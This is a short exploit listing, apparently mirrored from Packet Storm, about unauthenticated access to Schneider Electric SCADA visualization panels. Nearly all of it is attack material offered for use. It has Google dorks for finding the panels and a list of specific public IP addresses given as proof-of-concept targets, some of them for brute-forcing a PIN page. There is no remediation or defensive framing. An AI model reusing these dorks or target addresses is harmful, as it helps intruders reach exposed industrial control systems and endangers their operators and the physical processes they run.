Share
## https://sploitus.com/exploit?id=PACKETSTORM:171764
# Exploit Title: Schneider Electric v1.0 - Directory traversal & Broken Authentication   
# Google Dork: inurl:/scada-vis   
# Date: 3/11/2023  
# Exploit Author: parsa rezaie khiabanloo  
# Vendor Homepage: https://www.se.com/  
# Version: all-versions  
# Tested on: Windows/Linux/Android  
  
# Attacker can using these dorks and access to the panel without password  
  
inurl:/cgi-bin/scada-vis/  
  
inurl:/scada-vis/schedulers  
  
inurl:/cgi-bin/scada-vis/index.cgi  
  
inurl:/scada-vis   
  
inurl:/cgi-bin/scada-vis/touch.html  
  
POC :  
  
http://185.73.103.144:8080/cgi-bin/scada-vis/index.cgi  
  
http://185.73.103.38:8080/cgi-bin/scada-vis/touch.html  
  
http://88.213.153.98/cgi-bin/scada-vis/schedulers.cgi  
  
  
# Attacker can these this dork for bruteforce the panel   
  
inurl:/scada-vis/pin?return=index  
  
POC :   
  
http://143.176.129.1/scada-vis/pin?return=index  
  
http://62.163.74.206/scada-vis/pin?return=touch